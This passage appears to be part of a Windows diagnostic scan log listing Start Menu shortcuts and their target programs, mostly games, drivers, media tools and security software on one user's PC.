Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spore\Spore.lnk -> F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe (Maxis, a division of Electronic Arts Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spore\Technical Support.lnk -> F:\Program Files (x86)\Origin Games\Spore\Support\EA Help\Technical Support.en_US.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spore\User Agreement.lnk -> F:\Program Files (x86)\Origin Games\Spore\Support\eula\en_US.html ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sony\Xperia Companion\Xperia Companion.lnk -> C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanion.exe (Sony)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sir Garnon\Fallout 4 Image Viewer\Fallout 4 Image Viewer.lnk -> C:\Windows\Installer\{200E4E99-8D0E-4575-A401-955C13BB5F0B}\_5ACCDB13731A451CA2DFC96DF50A68A0.exe (Flexera Software LLC)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SD Association\SD Card Formatter\SD Card Formatter.lnk -> C:\Windows\Installer\{10C16E01-F739-4093-89A7-E570589FA0F6}\NewShortcut1_69C2B9A012C943F8B6BC658D1AC73474.exe (Flexera Software LLC)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Screaming Bee\MorphVOX Pro\MorphVOX Pro.lnk -> C:\Program Files (x86)\Screaming Bee\MorphVOX Pro\MorphVOXPro.exe (Screaming Bee)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Clean Wipe Utility.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpCleanWipe.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Debug Info Collector.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpDebugInfoCollector.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Driver Installer.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpDriverInstaller.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Monitor (legacy).lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpMonitor.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Settings Manager.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpSettings.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Stand-alone Server (legacy).lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpServer.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit\ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician\Desinstalar o Samsung Magician.lnk -> C:\Program Files (x86)\Samsung\Samsung Magician\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician\Samsung Magician.lnk -> C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe (Samsung Electronics Co. Ltd.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Renesas Electronics\USB 3.0 Host Controller Driver\USB 3.0 Host Controller Utility.lnk -> C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3utl.exe (Renesas Electronics Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent\qBittorrent.lnk -> D:\Programs\qBittorrent\qbittorrent.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent\Uninstall.lnk -> D:\Programs\qBittorrent\uninst.exe (The qBittorrent project)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies\Plants vs. Zombies End User License Agreement.lnk -> F:\Program Files (x86)\Origin Games\Plants vs. Zombies\Plants vs. Zombies EN\eula.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies\Plants vs. Zombies.lnk -> F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies\Read Me.lnk -> F:\Program Files (x86)\Origin Games\Plants vs. Zombies\Plants vs. Zombies EN\readme.html ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants vs. Zombies\Technical Support.lnk -> F:\Program Files (x86)\Origin Games\Plants vs. Zombies\Support\EA Help\Technical Support.en_US.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Peace\Peace.lnk -> C:\Program Files\EqualizerAPO\config\Peace.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ozone Neon 3K Driver\Uninstall.lnk -> C:\Program Files (x86)\InstallShield Installation Information\{FA367E43-1B7B-45B2-80DC-8FEF62F4A929}\setup.exe (Macrovision Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin\Desinstalar a Origin.lnk -> F:\Origin\OriginUninstall.exe (Electronic Arts)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin\Ferramenta de relatórios de erros Origin.lnk -> F:\Origin\OriginER.exe (Electronic Arts)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin\Origin.lnk -> F:\Origin\Origin.exe (Electronic Arts)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio\OBS Studio (32bit).lnk -> F:\obs-studio\bin\32bit\obs32.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio\OBS Studio (64bit).lnk -> F:\obs-studio\bin\64bit\obs64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio\Uninstall.lnk -> F:\obs-studio\uninstall.exe (obsproject.com)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVMP\New Vegas Multiplayer.lnk -> F:\Games\SteamLibrary\steamapps\common\Fallout New Vegas\Client.exe (NV:MP Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\DXT Compression Plug-in User Guide.lnk -> C:\Program Files\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\PhotoshopDDSPlugin.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\License.lnk -> C:\Program Files\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\License.pdf (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\Normal Map Plug-in User Guide.lnk -> C:\Program Files\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\PhotoshopNormalMapFilter.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\NVIDIA Scripts User Guide.lnk -> C:\Program Files\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\NVJavaScript.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\NVIDIA Photoshop Plug-ins 64 bit\Uninstall NVIDIA Photoshop Plug-ins 64 bit.lnk -> C:\Program Files (x86)\InstallShield Installation Information\{5E386C5B-CDE7-435A-B5C9-EC73A1B0553A}\setup.exe (InstallShield Software Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision Photo Viewer.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstview.exe (NVIDIA Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++\Notepad++.lnk -> C:\Program Files (x86)\Notepad++\notepad++.exe (Don HO don.h@free.fr)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager\Nexus Mod Manager.lnk -> C:\Program Files\Nexus Mod Manager\NexusClient.exe (Black Tree Gaming)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager\Uninstall Nexus Mod Manager.lnk -> C:\Program Files\Nexus Mod Manager\uninstall\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest\NCLauncher\Uninstall - NCLauncher.lnk -> C:\Program Files (x86)\NCWest\NCLauncher\Uninstall.exe (NCSOFT Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories\Microsoft Xbox 360 Accessories Help.lnk -> C:\Program Files\Microsoft Xbox 360 Accessories\Xboxhelp.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories\Microsoft Xbox 360 Accessories Status.lnk -> C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight.lnk -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\Silverlight.Configuration.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDownloader\MegaDownloader.lnk -> F:\Program Files\MegaDownloader\MegaDownloader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MegaDownloader\Uninstall MegaDownloader.lnk -> F:\Program Files\MegaDownloader\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mass Effect 2\Mass Effect 2 End User License Agreement.lnk -> F:\Program Files (x86)\Origin Games\Mass Effect 2\Support\eula\en_US_eula.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mass Effect 2\Mass Effect 2.lnk -> F:\Program Files (x86)\Origin Games\Mass Effect 2\Binaries\MassEffect2.exe (BioWare)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mass Effect 2\Read Me.lnk -> F:\Program Files (x86)\Origin Games\Mass Effect 2\Support\readme\readme.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mass Effect 2\Technical Support.lnk -> F:\Program Files (x86)\Origin Games\Mass Effect 2\Support\EA Help\Technical Support.en_US.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Malwarebytes Anti-Malware.lnk -> C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Uninstall Malwarebytes Anti-Malware.lnk -> C:\Program Files (x86)\Malwarebytes Anti-Malware\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk -> C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\chameleon.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Create Recovery Disc.lnk -> C:\Windows\System32\recdisc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Remote Assistance.lnk -> C:\Windows\System32\msra.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends\League of Legends.lnk -> D:\Cancro game\LeagueClient.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Codec Tweak Tool.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Media Player Classic (x86).lnk -> C:\Program Files (x86)\K-Lite Codec Pack\MPC-HC\mpc-hc.exe (MPC-HC Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Media Player Classic.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\MPC-HC64\mpc-hc64.exe (MPC-HC Team)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Uninstall\Uninstall K-Lite Codec Pack.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\FourCC Code Changer.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\fourcc.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext (x64).lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\Haali Muxer.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Filters\Haali\gdsmux.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\MediaInfo.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\mediainfo.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\VobSubStrip.lnk -> C:\Program Files (x86)\K-Lite Codec Pack\Tools\VobSubStrip.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Configure Java.lnk -> C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe (Oracle Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel\Intel(R) Rapid Storage Technology.lnk -> C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorUI.exe (Intel Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\Program Files (x86)\Image-Line\FL Studio 12\FL.exe (Image-Line)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HWiNFO64\HWiNFO64.lnk -> F:\Programs\HWiNFO64\HWiNFO64.EXE (REALiX)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Help.lnk -> C:\Program Files (x86)\HP\HP Deskjet 3520 series\bin\HelpViewer\hpqlpvwr.exe (Hewlett-Packard Co.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\HP Scan.lnk -> C:\Program Files (x86)\HP\HP Deskjet 3520 series\bin\HPScan.exe (Hewlett-Packard Co.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Printer Setup & Software.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\DeviceSetupLauncher.exe (Hewlett-Packard Co.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Product Support Website.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\ProductSupportShortcut.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Shop for Supplies.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\Bin\hpqDTSS.exe (Hewlett-Packard Co.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP\HP Deskjet 3520 series\Wireless Printing Online Help.lnk -> C:\Program Files\HP\HP Deskjet 3520 series\WirelessEasyShortcut.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hi-Rez Studios\Hi-Rez Diagnostics and Support.lnk -> C:\Program Files (x86)\Hi-Rez Studios\HiRezGamesDiagAndSupport.exe (Hewlett-Packard Company)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\HD Tune Pro Drive Status Manual.lnk -> F:\Program Files (x86)\HD Tune Pro\hdtuneprodrivestatus.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\HD Tune Pro Drive Status.lnk -> F:\Program Files (x86)\HD Tune Pro\HDTuneProDriveStatus.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\HD Tune Pro Manual.lnk -> F:\Program Files (x86)\HD Tune Pro\hdtunepro.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\HD Tune Pro on the Web.lnk -> F:\Program Files (x86)\HD Tune Pro\HDTunePro.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\HD Tune Pro.lnk -> F:\Program Files (x86)\HD Tune Pro\HDTunePro.exe (EFD Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HD Tune Pro\Uninstall HD Tune Pro.lnk -> F:\Program Files (x86)\HD Tune Pro\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo\Gyazo GIF.lnk -> C:\Program Files (x86)\Gyazo\GyazoGIF.exe (Nota Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo\Gyazo.lnk -> C:\Program Files (x86)\Gyazo\Gyazowin.exe (Nota Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guitar Pro 6\Guitar Pro 6.lnk -> F:\Program Files (x86)\Guitar Pro 6\GuitarPro.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guitar Pro 6\Help.lnk -> F:\Program Files (x86)\Guitar Pro 6\Data\Help\GP6 User's Manual 2010.06 EN.pdf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guitar Pro 6\Software update.lnk -> F:\Program Files (x86)\Guitar Pro 6\GPUpdater.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guitar Pro 6\Uninstall Guitar Pro 6.lnk -> F:\Program Files (x86)\Guitar Pro 6\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com\Planetbase\Planetbase.lnk -> D:\Games\Planetbase\Planetbase.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com\Planetbase\Uninstall Planetbase.lnk -> D:\Games\Planetbase\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\FurMark.lnk -> F:\Program Files (x86)\FurMark\FurMark.exe (Geeks3D (www.geeks3d.com))
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Geeks3D\Benchmarks\FurMark\Uninstall  FurMark.lnk -> F:\Program Files (x86)\FurMark\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Battlefield 3™.lnk -> [LF6"pH,R GFSI+kHCMBattlefield 3"!(1SPSXFL8C&m]
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk -> C:\Windows\System32\gameux.dll (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Mass Effect™ 2.lnk -> [LF6"pH,R GFSI5IAS0Mass Effect"! 2(1SPSXFL8C&m]
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Plants vs. Zombies™.lnk -> [LF6"pH,R GFSI.gHOJPlants vs. Zombies"!(1SPSXFL8C&m]
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\STAR WARS™ The Old Republic™.lnk -> [LF6"pH,R GFSIgJvRK2xSTAR WARS"!: The Old Republic"!(1SPSXFL8C&m]
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET\ESET NOD32 Antivirus\ESET NOD32 Antivirus.lnk -> C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe (ESET)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET\ESET NOD32 Antivirus\ESET SysInspector.lnk -> C:\Program Files\ESET\ESET NOD32 Antivirus\SysInspector.exe (ESET)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET\ESET NOD32 Antivirus\ESET SysRescue.lnk -> C:\Program Files\ESET\ESET NOD32 Antivirus\SysRescue.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET\ESET NOD32 Antivirus\License agreement.lnk -> C:\Program Files\ESET\ESET NOD32 Antivirus\eula.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\Star Wars - The Old Republic.lnk -> F:\Games\Star Wars-The Old Republic\launcher.exe (BioWare)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\SWTOR Customer Support.lnk -> F:\Games\Star Wars-The Old Republic\SWTOR Customer Support.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\Uninstall Star Wars - The Old Republic.lnk -> C:\Program Files (x86)\Common Files\BioWare\Uninstall Star Wars - The Old Republic.exe (BioWare, LucasArts)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\View License.lnk -> F:\Games\Star Wars-The Old Republic\EUALAs\EUALA_en.rtf (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA\BioWare\Star Wars - The Old Republic\View Readme.lnk -> F:\Games\Star Wars-The Old Republic\readmes\readme_en.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite\DAEMON Tools Lite.lnk -> C:\Program Files\DAEMON Tools Lite\DTLauncher.exe (Disc Soft Ltd)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberGhost 6\CyberGhost 6.lnk -> F:\Program Files\CyberGhost 6\CyberGhost.exe (CyberGhost S.A.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberGhost 6\Uninstall CyberGhost 6.lnk -> F:\Program Files\CyberGhost 6\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crazybump\Crazybump.lnk -> F:\Program Files (x86)\Crazybump\CrazyBump.exe (CrazyBump Software)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crazybump\Uninstall.lnk -> F:\Program Files (x86)\Crazybump\Uninst.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID\CPU-Z\CPU-Z.lnk -> D:\Programs\CPU-Z\cpuz.exe (CPUID)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID\CPU-Z\Edit CPU-Z Config File.lnk -> D:\Programs\CPU-Z\cpuz.ini ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID\CPU-Z\Uninstall CPU-Z.lnk -> D:\Programs\CPU-Z\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine 6.7 (32-bit).lnk -> F:\Program Files (x86)\Cheat Engine 6.7\cheatengine-i386.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine 6.7 (64-bit).lnk -> F:\Program Files (x86)\Cheat Engine 6.7\cheatengine-x86_64.exe (Cheat Engine)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine 6.7.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\Cheat Engine.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine help.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\CheatEngine.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine tutorial (64-bit).lnk -> F:\Program Files (x86)\Cheat Engine 6.7\Tutorial-x86_64.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Cheat Engine tutorial.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\Tutorial-i386.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Reset settings.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\ceregreset.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Uninstall Cheat Engine.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.7\Kernel stuff\Unload kernel module.lnk -> F:\Program Files (x86)\Cheat Engine 6.7\Kernelmoduleunloader.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda.net Launcher\Bethesda.net Launcher.lnk -> C:\Program Files (x86)\Bethesda.net Launcher\BethesdaNetUpdater.exe (Bethesda Softworks)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda.net Launcher\Uninstall Bethesda.net Launcher.lnk -> C:\Program Files (x86)\Bethesda.net Launcher\unins000.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3\Battlefield 3.lnk -> F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe (EA Digital Illusions CE AB)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3\EA EULA.lnk -> F:\Program Files (x86)\Origin Games\Battlefield 3\Support\eula\en_US_eula.rtf ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3\Read Me.lnk -> F:\Program Files (x86)\Origin Games\Battlefield 3\Support\readme\readme.txt ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3\Technical Support.lnk -> F:\Program Files (x86)\Origin Games\Battlefield 3\Support\EA Help\Electronic_Arts_Technical_Support.htm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\Active Window Info (Window Spy).lnk -> C:\Program Files\AutoHotkey\AU3_Spy.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\AutoHotkey Help File.lnk -> C:\Program Files\AutoHotkey\AutoHotkey.chm ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\AutoHotkey Setup.lnk -> C:\Program Files\AutoHotkey\Installer.ahk ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\AutoHotkey.lnk -> C:\Program Files\AutoHotkey\AutoHotkey.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\Convert .ahk to .exe.lnk -> C:\Program Files\AutoHotkey\Compiler\Ahk2Exe.exe ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoHotkey\Website.lnk -> C:\Program Files\AutoHotkey\AutoHotkey Website.url ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk -> C:\Windows\System32\comexp.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk -> C:\Windows\System32\odbcad32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk -> C:\Windows\System32\iscsicpl.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Tool.lnk -> C:\Windows\System32\MdSched.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Microsoft .NET Framework 1.1 Configuration.lnk -> C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorcfg.msc ()
